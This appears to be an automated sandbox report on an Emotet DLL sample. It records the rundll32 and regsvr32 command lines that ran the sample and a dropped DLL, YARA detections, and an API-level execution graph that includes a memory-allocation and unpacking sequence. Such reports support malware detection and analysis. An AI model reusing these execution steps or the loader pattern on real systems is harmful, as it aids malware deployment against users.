                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.395798586.000002165C820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:4
                                                                  Start time:04:57:17
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllRegisterServer
                                                                  Imagebase:0x7ff71b1e0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.399182634.0000013444F90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:5
                                                                  Start time:04:57:21
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllUnregisterServer
                                                                  Imagebase:0x7ff71b1e0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:6
                                                                  Start time:04:57:22
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FxQLsR\ONbDjBVKT.dll"
                                                                  Imagebase:0x7ff655080000
                                                                  File size:24064 bytes
                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.775504614.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:10
                                                                  Start time:04:57:54
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                  Imagebase:0x7ff726010000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:14
                                                                  Start time:04:58:27
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff726010000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:19
                                                                  Start time:04:59:00
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff726010000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:20
                                                                  Start time:04:59:09
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff726010000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:21
                                                                  Start time:04:59:28
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff726010000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:23
                                                                  Start time:04:59:46
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff726010000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:10.6%
                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                    Signature Coverage:16.2%
                                                                    Total number of Nodes:684
                                                                    Total number of Limit Nodes:6
                                                                    execution_graph 9669 7fff21bb1ee7 9670 7fff21bb1f13 RtlAllocateHeap 9669->9670 9671 7fff21bb1f3d RtlDeleteBoundaryDescriptor 9670->9671 9672 7fff21bb1f5c 9670->9672 9671->9672 9673 560000 9674 560183 9673->9674 9675 56043e VirtualAlloc 9674->9675 9678 560462 9675->9678 9676 560531 GetNativeSystemInfo 9677 56056d VirtualAlloc 9676->9677 9681 560a7b 9676->9681 9679 56058b 9677->9679 9678->9676 9678->9681 9680 560a00 9679->9680 9683 5609d9 VirtualProtect 9679->9683 9680->9681 9682 560a56 RtlAddFunctionTable 9680->9682 9682->9681 9683->9679 9684 180021c3c 9685 180021c97 9684->9685 9688 180001bdc 9685->9688 9687 180021e38 9689 180001c82 9688->9689 9690 180001d21 CreateProcessW 9689->9690 9690->9687 9691 7fff21bb2290 9693 7fff21bb22b6 9691->9693 9692 7fff21bb22f3 9700 7fff21bb22be 9692->9700 9745 7fff21b71230 9692->9745 9693->9692 9693->9700 9703 7fff21bb2154 9693->9703 9697 7fff21bb2335 9698 7fff21bb2154 126 API calls 9697->9698 9697->9700 9698->9700 9699 7fff21b71230 8 API calls 9701 7fff21bb2328 9699->9701 9702 7fff21bb2154 126 API calls 9701->9702 9702->9697 9704 7fff21bb21e1 9703->9704 9705 7fff21bb2162 9703->9705 9707 7fff21bb221e 9704->9707 9714 7fff21bb21e5 9704->9714 9750 7fff21bb4110 HeapCreate 9705->9750 9708 7fff21bb2279 9707->9708 9709 7fff21bb2223 9707->9709 9711 7fff21bb216d 9708->9711 9870 7fff21bb2f50 9708->9870 9843 7fff21bb3108 9709->9843 9711->9692 9714->9711 9717 7fff21bb3a48 46 API calls 9714->9717 9716 7fff21bb2179 _RTC_Initialize 9719 7fff21bb217d 9716->9719 9727 7fff21bb2189 GetCommandLineA 9716->9727 9720 7fff21bb2212 9717->9720 9848 7fff21bb415c HeapDestroy 9719->9848 9723 7fff21bb2c94 48 API calls 9720->9723 9721 7fff21bb2243 FlsSetValue 9724 7fff21bb2259 9721->9724 9725 7fff21bb226f 9721->9725 9726 7fff21bb2217 9723->9726 9855 7fff21bb2cbc 9724->9855 9864 7fff21bb3024 9725->9864 9854 7fff21bb415c HeapDestroy 9726->9854 9769 7fff21bb3eec 9727->9769 9738 7fff21bb21b7 9744 7fff21bb21cb 9738->9744 9822 7fff21bb3aec 9738->9822 9741 7fff21bb21ab 9807 7fff21bb2c94 9741->9807 9744->9711 9849 7fff21bb3a48 9744->9849 9746 7fff21b71249 wcsftime 9745->9746 9747 7fff21b71276 9746->9747 9748 7fff21bb20e0 __initmbctable 8 API calls 9747->9748 9749 7fff21bb203e 9748->9749 9749->9697 9749->9699 9751 7fff21bb2169 9750->9751 9752 7fff21bb4134 HeapSetInformation 9750->9752 9751->9711 9753 7fff21bb2fa0 9751->9753 9752->9751 9876 7fff21bb36f0 9753->9876 9755 7fff21bb2fab 9881 7fff21bb6970 9755->9881 9758 7fff21bb3014 9761 7fff21bb2c94 48 API calls 9758->9761 9759 7fff21bb2fb4 FlsAlloc 9759->9758 9760 7fff21bb2fcc 9759->9760 9762 7fff21bb3108 __wtomb_environ 45 API calls 9760->9762 9763 7fff21bb3019 9761->9763 9764 7fff21bb2fdb 9762->9764 9763->9716 9764->9758 9765 7fff21bb2fe3 FlsSetValue 9764->9765 9765->9758 9766 7fff21bb2ff6 9765->9766 9767 7fff21bb2cbc _set_errno 45 API calls 9766->9767 9768 7fff21bb3000 GetCurrentThreadId 9767->9768 9768->9763 9770 7fff21bb3f4d 9769->9770 9771 7fff21bb3f1b GetEnvironmentStringsW 9769->9771 9772 7fff21bb3f29 9770->9772 9774 7fff21bb4010 9770->9774 9771->9772 9773 7fff21bb3f35 GetLastError 9771->9773 9776 7fff21bb3f5b GetEnvironmentStringsW 9772->9776 9777 7fff21bb3f70 WideCharToMultiByte 9772->9777 9773->9770 9775 7fff21bb401d GetEnvironmentStrings 9774->9775 9778 7fff21bb219b 9774->9778 9775->9778 9779 7fff21bb402f 9775->9779 9776->9777 9776->9778 9781 7fff21bb3fbe 9777->9781 9782 7fff21bb3fff 9777->9782 9794 7fff21bb3758 GetStartupInfoA 9778->9794 9785 7fff21bb309c __setargv 45 API calls 9779->9785 9888 7fff21bb309c 9781->9888 9784 7fff21bb4002 FreeEnvironmentStringsW 9782->9784 9784->9778 9787 7fff21bb4053 9785->9787 9788 7fff21bb4069 __initmbctable 9787->9788 9789 7fff21bb405b FreeEnvironmentStringsA 9787->9789 9792 7fff21bb4077 FreeEnvironmentStringsA 9788->9792 9789->9778 9790 7fff21bb3fce WideCharToMultiByte 9790->9784 9791 7fff21bb3ff7 9790->9791 9793 7fff21bb3024 free 45 API calls 9791->9793 9792->9778 9793->9782 9795 7fff21bb3108 __wtomb_environ 45 API calls 9794->9795 9803 7fff21bb3795 9795->9803 9796 7fff21bb21a7 9796->9741 9815 7fff21bb3df4 9796->9815 9797 7fff21bb3981 GetStdHandle 9802 7fff21bb395b 9797->9802 9798 7fff21bb39b0 GetFileType 9798->9802 9799 7fff21bb3108 __wtomb_environ 45 API calls 9799->9803 9800 7fff21bb3a10 SetHandleCount 9800->9796 9801 7fff21bb38c4 9801->9796 9801->9802 9804 7fff21bb38f7 GetFileType 9801->9804 9806 7fff21bb7ee4 _lock InitializeCriticalSectionAndSpinCount 9801->9806 9802->9796 9802->9797 9802->9798 9802->9800 9805 7fff21bb7ee4 _lock InitializeCriticalSectionAndSpinCount 9802->9805 9803->9796 9803->9799 9803->9801 9803->9802 9804->9801 9805->9802 9806->9801 9808 7fff21bb2cb0 9807->9808 9809 7fff21bb2ca3 FlsFree 9807->9809 9810 7fff21bb6a2f DeleteCriticalSection 9808->9810 9811 7fff21bb6a4d 9808->9811 9809->9808 9812 7fff21bb3024 free 45 API calls 9810->9812 9813 7fff21bb6a5b DeleteCriticalSection 9811->9813 9814 7fff21bb6a6a 9811->9814 9812->9808 9813->9811 9814->9719 9816 7fff21bb3e0c 9815->9816 9817 7fff21bb3e11 GetModuleFileNameA 9815->9817 10034 7fff21bb4ecc 9816->10034 9819 7fff21bb3e43 __setargv 9817->9819 9820 7fff21bb309c __setargv 45 API calls 9819->9820 9821 7fff21bb3e97 __setargv 9819->9821 9820->9821 9821->9738 9823 7fff21bb3b09 9822->9823 9825 7fff21bb3b0e _FF_MSGBANNER 9822->9825 9824 7fff21bb4ecc __initmbctable 83 API calls 9823->9824 9824->9825 9826 7fff21bb3108 __wtomb_environ 45 API calls 9825->9826 9833 7fff21bb21c0 9825->9833 9834 7fff21bb3b4d _FF_MSGBANNER 9826->9834 9827 7fff21bb3bc6 9828 7fff21bb3024 free 45 API calls 9827->9828 9828->9833 9829 7fff21bb3108 __wtomb_environ 45 API calls 9829->9834 9830 7fff21bb3c02 9831 7fff21bb3024 free 45 API calls 9830->9831 9831->9833 9832 7fff21bb7fbc _FF_MSGBANNER 45 API calls 9832->9834 9833->9744 9837 7fff21bb347c 9833->9837 9834->9827 9834->9829 9834->9830 9834->9832 9834->9833 9835 7fff21bb3ba2 9834->9835 9836 7fff21bb6550 _invalid_parameter_noinfo 6 API calls 9835->9836 9836->9834 9838 7fff21bb3492 _cinit 9837->9838 10438 7fff21bb73f4 9838->10438 9840 7fff21bb34af _initterm_e 9842 7fff21bb34d2 _cinit 9840->9842 10441 7fff21bb73dc 9840->10441 9842->9744 9844 7fff21bb312d 9843->9844 9846 7fff21bb2237 9844->9846 9847 7fff21bb314b Sleep 9844->9847 10458 7fff21bb6cec 9844->10458 9846->9711 9846->9721 9847->9844 9847->9846 9848->9711 9853 7fff21bb3a59 9849->9853 9850 7fff21bb3aa8 9850->9741 9851 7fff21bb3a70 DeleteCriticalSection 9851->9853 9852 7fff21bb3024 free 45 API calls 9852->9853 9853->9850 9853->9851 9853->9852 9854->9711 9856 7fff21bb6ba0 _lock 45 API calls 9855->9856 9857 7fff21bb2d11 9856->9857 10467 7fff21bb6a80 LeaveCriticalSection 9857->10467 9865 7fff21bb3029 HeapFree 9864->9865 9869 7fff21bb3059 realloc 9864->9869 9866 7fff21bb3044 9865->9866 9865->9869 9867 7fff21bb67e0 _errno 43 API calls 9866->9867 9868 7fff21bb3049 GetLastError 9867->9868 9868->9869 9869->9711 9871 7fff21bb2f88 9870->9871 9872 7fff21bb2f64 9870->9872 9871->9711 9873 7fff21bb2f69 FlsGetValue 9872->9873 9874 7fff21bb2f78 FlsSetValue 9872->9874 9873->9874 10468 7fff21bb2e18 9874->10468 9885 7fff21bb2c5c EncodePointer 9876->9885 9878 7fff21bb36fb _initp_misc_winsig 9879 7fff21bb755c EncodePointer 9878->9879 9880 7fff21bb373e EncodePointer 9879->9880 9880->9755 9882 7fff21bb6993 9881->9882 9884 7fff21bb2fb0 9882->9884 9886 7fff21bb7ee4 InitializeCriticalSectionAndSpinCount 9882->9886 9884->9758 9884->9759 9887 7fff21bb7f11 9886->9887 9887->9882 9890 7fff21bb30b8 9888->9890 9891 7fff21bb30f0 9890->9891 9892 7fff21bb30d0 Sleep 9890->9892 9893 7fff21bb6c34 9890->9893 9891->9782 9891->9790 9892->9890 9892->9891 9894 7fff21bb6cc8 realloc 9893->9894 9897 7fff21bb6c4c realloc 9893->9897 9899 7fff21bb67e0 _errno 44 API calls 9894->9899 9895 7fff21bb6c84 RtlAllocateHeap 9895->9897 9900 7fff21bb6cbd 9895->9900 9896 7fff21bb6c64 9896->9895 9907 7fff21bb7160 9896->9907 9916 7fff21bb6f0c 9896->9916 9949 7fff21bb334c 9896->9949 9897->9895 9897->9896 9901 7fff21bb6cad 9897->9901 9904 7fff21bb6cb2 9897->9904 9899->9900 9900->9890 9952 7fff21bb67e0 9901->9952 9906 7fff21bb67e0 _errno 44 API calls 9904->9906 9906->9900 9955 7fff21bbd2ac 9907->9955 9909 7fff21bb717d 9912 7fff21bb6f0c _FF_MSGBANNER 45 API calls 9909->9912 9914 7fff21bb719e 9909->9914 9911 7fff21bbd2ac _FF_MSGBANNER 45 API calls 9911->9909 9913 7fff21bb7194 9912->9913 9915 7fff21bb6f0c _FF_MSGBANNER 45 API calls 9913->9915 9914->9896 9915->9914 9917 7fff21bb6f2f 9916->9917 9918 7fff21bbd2ac _FF_MSGBANNER 42 API calls 9917->9918 9948 7fff21bb70d4 9917->9948 9919 7fff21bb6f51 9918->9919 9920 7fff21bb70d6 GetStdHandle 9919->9920 9921 7fff21bbd2ac _FF_MSGBANNER 42 API calls 9919->9921 9922 7fff21bb70e9 _FF_MSGBANNER 9920->9922 9920->9948 9923 7fff21bb6f64 9921->9923 9925 7fff21bb70ff WriteFile 9922->9925 9922->9948 9923->9920 9924 7fff21bb6f75 9923->9924 9924->9948 9974 7fff21bb7fbc 9924->9974 9925->9948 9928 7fff21bb6fb9 GetModuleFileNameA 9929 7fff21bb6fd9 9928->9929 9933 7fff21bb700a _FF_MSGBANNER 9928->9933 9931 7fff21bb7fbc _FF_MSGBANNER 42 API calls 9929->9931 9930 7fff21bb6550 _invalid_parameter_noinfo 6 API calls 9930->9928 9932 7fff21bb6ff1 9931->9932 9932->9933 9936 7fff21bb6550 _invalid_parameter_noinfo 6 API calls 9932->9936 9934 7fff21bb7065 9933->9934 9983 7fff21bbbf14 9933->9983 9992 7fff21bbbdf4 9934->9992 9936->9933 9938 7fff21bb7090 9941 7fff21bbbdf4 _FF_MSGBANNER 42 API calls 9938->9941 9940 7fff21bb6550 _invalid_parameter_noinfo 6 API calls 9940->9938 9943 7fff21bb70a6 9941->9943 9944 7fff21bb70bf 9943->9944 9946 7fff21bb6550 _invalid_parameter_noinfo 6 API calls 9943->9946 10001 7fff21bbd0b8 9944->10001 9945 7fff21bb6550 _invalid_parameter_noinfo 6 API calls 9945->9934 9946->9944 9948->9896 10019 7fff21bb3310 GetModuleHandleW 9949->10019 10022 7fff21bb2d70 GetLastError FlsGetValue 9952->10022 9954 7fff21bb67e9 9954->9904 9956 7fff21bbd2b4 9955->9956 9957 7fff21bb716e 9956->9957 9958 7fff21bb67e0 _errno 45 API calls 9956->9958 9957->9909 9957->9911 9959 7fff21bbd2d9 9958->9959 9961 7fff21bb66d8 DecodePointer 9959->9961 9962 7fff21bb6723 _invalid_parameter_noinfo 9961->9962 9963 7fff21bb6709 9961->9963 9965 7fff21bb6550 9962->9965 9963->9957 9972 7fff21bb87a0 9965->9972 9968 7fff21bb65ad 9969 7fff21bb660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9968->9969 9970 7fff21bb6658 GetCurrentProcess TerminateProcess 9969->9970 9971 7fff21bb664c _invalid_parameter_noinfo 9969->9971 9970->9963 9971->9970 9973 7fff21bb6570 RtlCaptureContext 9972->9973 9973->9968 9975 7fff21bb7fc7 9974->9975 9976 7fff21bb7fd1 9974->9976 9975->9976 9981 7fff21bb7ffd 9975->9981 9977 7fff21bb67e0 _errno 45 API calls 9976->9977 9978 7fff21bb7fd9 9977->9978 9979 7fff21bb66d8 _invalid_parameter_noinfo 7 API calls 9978->9979 9980 7fff21bb6fa0 9979->9980 9980->9928 9980->9930 9981->9980 9982 7fff21bb67e0 _errno 45 API calls 9981->9982 9982->9978 9987 7fff21bbbf22 9983->9987 9984 7fff21bbbf27 9985 7fff21bb67e0 _errno 45 API calls 9984->9985 9986 7fff21bb704c 9984->9986 9988 7fff21bbbf51 9985->9988 9986->9934 9986->9945 9987->9984 9987->9986 9990 7fff21bbbf75 9987->9990 9989 7fff21bb66d8 _invalid_parameter_noinfo 7 API calls 9988->9989 9989->9986 9990->9986 9991 7fff21bb67e0 _errno 45 API calls 9990->9991 9991->9988 9993 7fff21bbbe0c 9992->9993 9994 7fff21bbbe02 9992->9994 9995 7fff21bb67e0 _errno 45 API calls 9993->9995 9994->9993 9997 7fff21bbbe50 9994->9997 9996 7fff21bbbe14 9995->9996 9998 7fff21bb66d8 _invalid_parameter_noinfo 7 API calls 9996->9998 9999 7fff21bb7077 9997->9999 10000 7fff21bb67e0 _errno 45 API calls 9997->10000 9998->9999 9999->9938 9999->9940 10000->9996 10018 7fff21bb2c5c EncodePointer 10001->10018 10020 7fff21bb332a GetProcAddress 10019->10020 10021 7fff21bb333f ExitProcess 10019->10021 10020->10021 10023 7fff21bb2dde SetLastError 10022->10023 10024 7fff21bb2d96 10022->10024 10023->9954 10025 7fff21bb3108 __wtomb_environ 40 API calls 10024->10025 10026 7fff21bb2da3 10025->10026 10026->10023 10027 7fff21bb2dab FlsSetValue 10026->10027 10028 7fff21bb2dd7 10027->10028 10029 7fff21bb2dc1 10027->10029 10030 7fff21bb3024 free 40 API calls 10028->10030 10031 7fff21bb2cbc _set_errno 40 API calls 10029->10031 10032 7fff21bb2ddc 10030->10032 10033 7fff21bb2dc8 GetCurrentThreadId 10031->10033 10032->10023 10033->10023 10035 7fff21bb4ed9 10034->10035 10036 7fff21bb4ee3 10034->10036 10038 7fff21bb4cd4 10035->10038 10036->9817 10062 7fff21bb2df4 10038->10062 10045 7fff21bb309c __setargv 45 API calls 10046 7fff21bb4d24 __initmbctable 10045->10046 10056 7fff21bb4e81 10046->10056 10085 7fff21bb4a0c 10046->10085 10049 7fff21bb4e83 10051 7fff21bb4e9c 10049->10051 10052 7fff21bb3024 free 45 API calls 10049->10052 10049->10056 10050 7fff21bb4d5f 10054 7fff21bb3024 free 45 API calls 10050->10054 10055 7fff21bb4d84 10050->10055 10053 7fff21bb67e0 _errno 45 API calls 10051->10053 10052->10051 10053->10056 10054->10055 10055->10056 10095 7fff21bb6ba0 10055->10095 10056->10036 10063 7fff21bb2d70 _set_errno 45 API calls 10062->10063 10064 7fff21bb2dff 10063->10064 10065 7fff21bb2e0f 10064->10065 10101 7fff21bb32e0 10064->10101 10067 7fff21bb48c0 10065->10067 10068 7fff21bb2df4 _getptd 45 API calls 10067->10068 10069 7fff21bb48cf 10068->10069 10070 7fff21bb48ea 10069->10070 10071 7fff21bb6ba0 _lock 45 API calls 10069->10071 10072 7fff21bb496e 10070->10072 10074 7fff21bb32e0 _getptd 45 API calls 10070->10074 10076 7fff21bb48fd 10071->10076 10078 7fff21bb497c 10072->10078 10074->10072 10075 7fff21bb4934 10106 7fff21bb6a80 LeaveCriticalSection 10075->10106 10076->10075 10077 7fff21bb3024 free 45 API calls 10076->10077 10077->10075 10107 7fff21bb2534 10078->10107 10081 7fff21bb499c GetOEMCP 10084 7fff21bb49ac 10081->10084 10082 7fff21bb49c1 10083 7fff21bb49c6 GetACP 10082->10083 10082->10084 10083->10084 10084->10045 10084->10056 10086 7fff21bb497c __initmbctable 47 API calls 10085->10086 10087 7fff21bb4a33 10086->10087 10088 7fff21bb4a3b __initmbctable 10087->10088 10089 7fff21bb4a8c IsValidCodePage 10087->10089 10094 7fff21bb4ab2 unexpected 10087->10094 10284 7fff21bb20e0 10088->10284 10089->10088 10091 7fff21bb4a9d GetCPInfo 10089->10091 10091->10088 10091->10094 10092 7fff21bb4c6f 10092->10049 10092->10050 10274 7fff21bb46dc GetCPInfo 10094->10274 10096 7fff21bb6bbe 10095->10096 10097 7fff21bb6bcf EnterCriticalSection 10095->10097 10412 7fff21bb6ab8 10096->10412 10100 7fff21bb32e0 _getptd 44 API calls 10100->10097 10102 7fff21bb7160 _FF_MSGBANNER 44 API calls 10101->10102 10103 7fff21bb32ed 10102->10103 10104 7fff21bb6f0c _FF_MSGBANNER 44 API calls 10103->10104 10105 7fff21bb32f4 DecodePointer 10104->10105 10108 7fff21bb254a 10107->10108 10112 7fff21bb25ae 10107->10112 10109 7fff21bb2df4 _getptd 45 API calls 10108->10109 10110 7fff21bb254f 10109->10110 10113 7fff21bb2587 10110->10113 10115 7fff21bb524c 10110->10115 10112->10081 10112->10082 10113->10112 10114 7fff21bb48c0 __initmbctable 45 API calls 10113->10114 10114->10112 10116 7fff21bb2df4 _getptd 45 API calls 10115->10116 10117 7fff21bb5257 10116->10117 10118 7fff21bb5280 10117->10118 10120 7fff21bb5272 10117->10120 10119 7fff21bb6ba0 _lock 45 API calls 10118->10119 10121 7fff21bb528a 10119->10121 10122 7fff21bb2df4 _getptd 45 API calls 10120->10122 10129 7fff21bb51f4 10121->10129 10123 7fff21bb5277 10122->10123 10127 7fff21bb52b8 10123->10127 10128 7fff21bb32e0 _getptd 45 API calls 10123->10128 10127->10113 10128->10127 10130 7fff21bb523e 10129->10130 10131 7fff21bb5202 ___lc_codepage_func 10129->10131 10133 7fff21bb6a80 LeaveCriticalSection 10130->10133 10131->10130 10134 7fff21bb4f04 10131->10134 10135 7fff21bb4f9b 10134->10135 10136 7fff21bb4f22 10134->10136 10137 7fff21bb4fee 10135->10137 10138 7fff21bb3024 free 45 API calls 10135->10138 10136->10135 10141 7fff21bb4f61 10136->10141 10150 7fff21bb3024 free 45 API calls 10136->10150 10146 7fff21bb501b 10137->10146 10186 7fff21bb98a4 10137->10186 10139 7fff21bb4fbf 10138->10139 10142 7fff21bb3024 free 45 API calls 10139->10142 10143 7fff21bb4f83 10141->10143 10154 7fff21bb3024 free 45 API calls 10141->10154 10145 7fff21bb4fd3 10142->10145 10148 7fff21bb3024 free 45 API calls 10143->10148 10153 7fff21bb3024 free 45 API calls 10145->10153 10147 7fff21bb5067 10146->10147 10152 7fff21bb3024 45 API calls free 10146->10152 10155 7fff21bb4f8f 10148->10155 10149 7fff21bb3024 free 45 API calls 10149->10146 10151 7fff21bb4f55 10150->10151 10162 7fff21bb9df8 10151->10162 10152->10146 10157 7fff21bb4fe2 10153->10157 10158 7fff21bb4f77 10154->10158 10159 7fff21bb3024 free 45 API calls 10155->10159 10160 7fff21bb3024 free 45 API calls 10157->10160 10178 7fff21bb9b68 10158->10178 10159->10135 10160->10137 10163 7fff21bb9e01 10162->10163 10176 7fff21bb9e87 10162->10176 10164 7fff21bb9e1b 10163->10164 10165 7fff21bb3024 free 45 API calls 10163->10165 10166 7fff21bb9e2d 10164->10166 10167 7fff21bb3024 free 45 API calls 10164->10167 10165->10164 10168 7fff21bb9e3f 10166->10168 10170 7fff21bb3024 free 45 API calls 10166->10170 10167->10166 10169 7fff21bb9e51 10168->10169 10171 7fff21bb3024 free 45 API calls 10168->10171 10172 7fff21bb3024 free 45 API calls 10169->10172 10173 7fff21bb9e63 10169->10173 10170->10168 10171->10169 10172->10173 10174 7fff21bb9e75 10173->10174 10175 7fff21bb3024 free 45 API calls 10173->10175 10174->10176 10177 7fff21bb3024 free 45 API calls 10174->10177 10175->10174 10176->10141 10177->10176 10179 7fff21bb9b6d 10178->10179 10180 7fff21bb9baa 10178->10180 10181 7fff21bb9b86 10179->10181 10182 7fff21bb3024 free 45 API calls 10179->10182 10180->10143 10183 7fff21bb9b98 10181->10183 10184 7fff21bb3024 free 45 API calls 10181->10184 10182->10181 10183->10180 10185 7fff21bb3024 free 45 API calls 10183->10185 10184->10183 10185->10180 10187 7fff21bb500f 10186->10187 10188 7fff21bb98ad 10186->10188 10187->10149 10189 7fff21bb3024 free 45 API calls 10188->10189 10190 7fff21bb98be 10189->10190 10191 7fff21bb3024 free 45 API calls 10190->10191 10192 7fff21bb98c7 10191->10192 10193 7fff21bb3024 free 45 API calls 10192->10193 10194 7fff21bb98d0 10193->10194 10195 7fff21bb3024 free 45 API calls 10194->10195 10196 7fff21bb98d9 10195->10196 10197 7fff21bb3024 free 45 API calls 10196->10197 10198 7fff21bb98e2 10197->10198 10199 7fff21bb3024 free 45 API calls 10198->10199 10200 7fff21bb98eb 10199->10200 10201 7fff21bb3024 free 45 API calls 10200->10201 10202 7fff21bb98f3 10201->10202 10203 7fff21bb3024 free 45 API calls 10202->10203 10204 7fff21bb98fc 10203->10204 10205 7fff21bb3024 free 45 API calls 10204->10205 10206 7fff21bb9905 10205->10206 10207 7fff21bb3024 free 45 API calls 10206->10207 10208 7fff21bb990e 10207->10208 10209 7fff21bb3024 free 45 API calls 10208->10209 10210 7fff21bb9917 10209->10210 10211 7fff21bb3024 free 45 API calls 10210->10211 10212 7fff21bb9920 10211->10212 10213 7fff21bb3024 free 45 API calls 10212->10213 10214 7fff21bb9929 10213->10214 10215 7fff21bb3024 free 45 API calls 10214->10215 10216 7fff21bb9932 10215->10216 10217 7fff21bb3024 free 45 API calls 10216->10217 10218 7fff21bb993b 10217->10218 10219 7fff21bb3024 free 45 API calls 10218->10219 10220 7fff21bb9944 10219->10220 10221 7fff21bb3024 free 45 API calls 10220->10221 10222 7fff21bb9950 10221->10222 10223 7fff21bb3024 free 45 API calls 10222->10223 10224 7fff21bb995c 10223->10224 10225 7fff21bb3024 free 45 API calls 10224->10225 10226 7fff21bb9968 10225->10226 10227 7fff21bb3024 free 45 API calls 10226->10227 10228 7fff21bb9974 10227->10228 10229 7fff21bb3024 free 45 API calls 10228->10229 10230 7fff21bb9980 10229->10230 10231 7fff21bb3024 free 45 API calls 10230->10231 10232 7fff21bb998c 10231->10232 10233 7fff21bb3024 free 45 API calls 10232->10233 10234 7fff21bb9998 10233->10234 10235 7fff21bb3024 free 45 API calls 10234->10235 10236 7fff21bb99a4 10235->10236 10237 7fff21bb3024 free 45 API calls 10236->10237 10238 7fff21bb99b0 10237->10238 10239 7fff21bb3024 free 45 API calls 10238->10239 10240 7fff21bb99bc 10239->10240 10241 7fff21bb3024 free 45 API calls 10240->10241 10242 7fff21bb99c8 10241->10242 10243 7fff21bb3024 free 45 API calls 10242->10243 10244 7fff21bb99d4 10243->10244 10245 7fff21bb3024 free 45 API calls 10244->10245 10246 7fff21bb99e0 10245->10246 10247 7fff21bb3024 free 45 API calls 10246->10247 10248 7fff21bb99ec 10247->10248 10249 7fff21bb3024 free 45 API calls 10248->10249 10250 7fff21bb99f8 